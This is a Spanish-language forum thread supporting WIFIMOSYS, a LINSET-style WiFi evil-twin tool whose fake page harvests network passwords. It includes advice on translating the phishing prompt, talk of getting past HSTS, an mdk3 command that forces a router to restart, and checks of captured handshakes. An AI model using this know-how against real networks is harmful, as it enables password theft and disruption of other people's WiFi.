Gracias! Saludos!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: ampamer en 05-05-2017, 04:04 (Viernes)
Una consulta por favor, me descargue el. Módulo de github y ahora como lo activo le. Doy. Permisos?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 05-05-2017, 15:34 (Viernes)
Es un módulo .xzm no tienes que activar nada y no vamos a volver a explicar como usarlo, usa el buscador del foro.

saludos


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 06-05-2017, 02:25 (S?bado)
Una consulta: la nueva versión del módulo ya está modificada para que la página fake aparezca también en direcciones "https" ?
Gracias! Saludos!

No. Y por lo que he tratado de informarme del tema, hoy por hoy no es posible.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: raiden2020 en 07-05-2017, 22:52 (Domingo)
Hola Vodker!
Que lástima que aún no sea posible implementar la página fake en webs "https".
Seguramente pronto descubrirás la forma  ;)
Felicitaciones por tu excelente trabajo y muchas gracias por brindárnoslo!
Saludos! :)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 07-05-2017, 23:21 (Domingo)
En realidad el problema no es HTTPS sino otra política de seguridad con nombre muy parecido: HSTS, que utiliza al navegador usado como capa de seguridad extra al solicitar las páginas, las cuales además han de tener un certificado válido.
Hice pruebas con Delorean (https://github.com/PentesterES/Delorean (https://github.com/PentesterES/Delorean)), pero nada.
Seguiremos buscando alternativas.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: raiden2020 en 08-05-2017, 01:55 (Lunes)
Hola Vodker!!
Ahhh, no sabía eso. Gracias por la información!
Siii, seguramente pronto encontrarás la forma. Posees muchos conocimientos.
Muchas gracias! Saludos! Muy buena semana!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 08-05-2017, 03:15 (Lunes)
¿Las paginas de configuración de los routers son https://? yo de esos no he visto ninguno.


Título: Re:
Publicado por: jorose1987 en 09-05-2017, 13:35 (Martes)
Vodker, ¿tienes intención de usar el método de desautentificación de siempre en vez de usar wifijammer o tener las dos opciones?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: nipponsensei en 10-05-2017, 23:58 (Mi?rcoles)
Hola, me gustaría aprovechar este hilo para hacer una consulta sobre mdk3 una de las herramientas que usa linset, me surgió la duda por un comentario que vi en otro foro: hay forma de forzar al modem a que se reinicie y cambie el canal en el que está trabajando? probé con este comando: timeout 360s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m -c 1 -e XXXXXXXX efectivamente logré el reinicio del modem pero no el cambio del canal, cosa que me dijeron era posible con ese mismo comando


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 11-05-2017, 02:25 (Jueves)
Vodker, ¿tienes intención de usar el método de desautentificación de siempre en vez de usar wifijammer o tener las dos opciones?

Le habéis tomado tirria a wifijammer, o algo... hace lo mismo que aireplay, lo mismo.

Hola, me gustaría aprovechar este hilo para hacer una consulta sobre mdk3 una de las herramientas que usa linset, me surgió la duda por un comentario que vi en otro foro: hay forma de forzar al modem a que se reinicie y cambie el canal en el que está trabajando? probé con este comando: timeout 360s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m -c 1 -e XXXXXXXX efectivamente logré el reinicio del modem pero no el cambio del canal, cosa que me dijeron era posible con ese mismo comando

Si es tu router (como debe ser, y no me digas otra cosa) ¿Por qué complicarse cuando puedes entrar a la configuración y cambiar de canal?

Saludos.


Título: Re:
Publicado por: jorose1987 en 11-05-2017, 09:40 (Jueves)
No es tirria a wifijammer, es más una opción más está de lujo sólo que estaría bien tener las dos opciones en el mismo programa.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: nipponsensei en 11-05-2017, 16:44 (Jueves)
Vodker, ¿tienes intención de usar el método de desautentificación de siempre en vez de usar wifijammer o tener las dos opciones?

Le habéis tomado tirria a wifijammer, o algo... hace lo mismo que aireplay, lo mismo.

Hola, me gustaría aprovechar este hilo para hacer una consulta sobre mdk3 una de las herramientas que usa linset, me surgió la duda por un comentario que vi en otro foro: hay forma de forzar al modem a que se reinicie y cambie el canal en el que está trabajando? probé con este comando: timeout 360s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m -c 1 -e XXXXXXXX efectivamente logré el reinicio del modem pero no el cambio del canal, cosa que me dijeron era posible con ese mismo comando

Si es tu router (como debe ser, y no me digas otra cosa) ¿Por qué complicarse cuando puedes entrar a la configuración y cambiar de canal?

Saludos.
Desafortunadamente para mi Movistar tienen una políticas para el usuario pésimas en Colombia, no facilitan la contraseña de administrador del modem y he llamado a 3 asesores para pedirles un simple cambio de canal del modem por que tengo problemas con un repetidor señal y no han dado con el chiste, lo último que quiero hacer es pedir una visita técnica para algo como eso, por esa razón hago la consulta.

Edito: al fin me atendió un asesor que si sabía donde estaba parado y me resolvió el problema, no se que clase de capacitación le dan al personal de Movistar pero ya planteada la duda me gustaría saber si es posible hacer lo que comenté con mdk3 o alguna otra herramienta.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: USUARIONUEVO en 14-05-2017, 22:34 (Domingo)
Tengo una pregunta ...

¿como compruebas la integridad del handshake?

no consigo ninguno valido ..me desocnecto y reconecto incluso manualmente y ni con esas ..siempre handshake "invalido" ..estoy en la revision ultimo que la actualice en la iso.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 14-05-2017, 23:52 (Domingo)

Edito: al fin me atendió un asesor que si sabía donde estaba parado y me resolvió el problema, no se que clase de capacitación le dan al personal de Movistar pero ya planteada la duda me gustaría saber si es posible hacer lo que comenté con mdk3 o alguna otra herramienta.


Me alegro de la solución a tu problema. En cuanto a la pregunta, eso de cambiar el canal de un router mediante una herramienta yo no lo he visto jamás.

Tengo una pregunta ...

¿como compruebas la integridad del handshake?

no consigo ninguno valido ..me desocnecto y reconecto incluso manualmente y ni con esas ..siempre handshake "invalido" ..estoy en la revision ultimo que la actualice en la iso.

Pues ya es raro, ya... el handshake se comprueba con pyrit y precisamente en la última versión 0.22 es más permisivo (antes solo se aceptaban handshakes con estatus good y ahora también son aceptados con workable tras pasarles un pyrit -r XXXXXXXX.cap analyze.

Volveré a repasar el código por si acaso hay algún error pero en mis pruebas, aunque alguno ha resultado durillo de capturar, al final ha caído.

Si tengo más noticias al respecto te respondo por aquí.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: faggella en 16-05-2017, 21:04 (Martes)
Hi, can i replace the phrase of the fake page "para volver to conectar introduce the contraseña wifi" with a phrase in italian "per problemi di sicurezza introduca la password wifi". How? Thank you.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 17-05-2017, 01:03 (Mi?rcoles)
Hi, can i replace the phrase of the fake page "para volver to conectar introduce the contraseña wifi" with a phrase in italian "per problemi di sicurezza introduca la password wifi". How? Thank you.

Of course, you just have to edit the file usr/bin/wifimosys with a text editor like KWrite and replace the text you choose.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: faggella en 21-05-2017, 10:15 (Domingo)
Of course, you just have to edit the file usr/bin/wifimosys with a text editor like KWrite and replace the text you choose.

Saludos.

Thanks Vodker


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: jfuentes102 en 21-05-2017, 16:41 (Domingo)
Hi, can i replace the phrase of the fake page "para volver to conectar introduce the contraseña wifi" with a phrase in italian "per problemi di sicurezza introduca la password wifi". How? Thank you.

Of course, you just have to edit the file usr/bin/wifimosys with a text editor like KWrite and replace the text you choose.

Saludos.
Perdona hermano no la quiero embarrar, pero el texto que puedo modificar, está en la linea 1045?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 21-05-2017, 19:24 (Domingo)

Perdona hermano no la quiero embarrar, pero el texto que puedo modificar, está en la linea 1045?


Hombreeeeee...... si no sabemos cómo va un editor de texto....  :-X

De todas formas, la excusa de faggella es el idioma, pero no alcanzo a entender ninguna otra.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: susaniita en 05-06-2017, 21:29 (Lunes)
Citar
Me alegro de la solución a tu problema. En cuanto a la pregunta, eso de cambiar el canal de un router mediante una herramienta yo no lo he visto jamás

pues todos los dias se aprende algo  >:(
yo con el script de geek95.sh mi router cambia de canal al rato
en vez de reiniciarlo

algunos router cambian de canal, receptivos a algun ataque, lo que no contralas es el canal
donde salta, que seria cualquiera y luego si atacas de nuevo vuelve al suyo
si lo intentas con dos tarjetas atacando a esos dos canales puede que salte a otro


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Gamus006 en 12-06-2017, 07:47 (Lunes)
Buenos dias a todos,

llevo varios dias leyendo y leyendo, pero no consigo quitar el siguiente error que me da tanto en
wifimosys como linset, el error se produce al escanear redes. La tarjeta con la que me da el error es una broadcom 43134 con sistema Kali linux. Vaya por delante que mis conocimientos de linux son limitados (estoy intentando aprender y como todo requiere su tiempo) por lo que agradecería que alguien me echase un cable.
En este mismo hilo vi que otro compañero tenía el mismo problema,  le daba el error por tener conectadas dos tarjetas pero no es mi caso, a ver si alguien a leído por ahi o le a pasado mi caso y me echa un cable.



wc: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
/usr/bin/wifimosys: línea 396: [: -le: se esperaba un operador unario
cat: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
expr: error de sintaxis
                        LISTADO DE REDES

  Nº    MAC                     CANAL    TIPO     PWR     NOMBRE DE LA RED

grep: el: No existe el fichero o el directorio
grep: número: No existe el fichero o el directorio
grep: de: No existe el fichero o el directorio
grep: líneas: No existe el fichero o el directorio
grep: no: No existe el fichero o el directorio
grep: es: No existe el fichero o el directorio
grep: válido:: No existe el fichero o el directorio
grep: «/tmp/Wifimosys/dump-01.csv»: No existe el fichero o el directorio
  1)    head: el número de líneas no es válido: «/tmp/Wifimosys/dump-01.csv»                      100%   

          (*) En rojo: redes con posibles clientes activos

          Selecciona el nº de la red a atacar...
          (Para reescanear pulsa r Para salir pulsa x)



Un saludo


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 12-06-2017, 09:12 (Lunes)

el error se produce al escanear redes. La tarjeta con la que me da el error es una broadcom 43134 con sistema Kali linux


El script está optimizado para Wifislax, que para eso es "nuestra distro". No sería difícil adaptarlo para Kali, pero la verdad es que no está entre mis prioridades.
Quizá este verano que tendré más tiempo.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Gamus006 en 13-06-2017, 07:51 (Martes)
Gracias Vodker por la respuesta, probare instalando wifislax, seguro que no tendré estos problemas, gracias por la aclaración.

Saludos.


Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios
Si continúa navegando consideramos que acepta su uso. OK Más información | Y más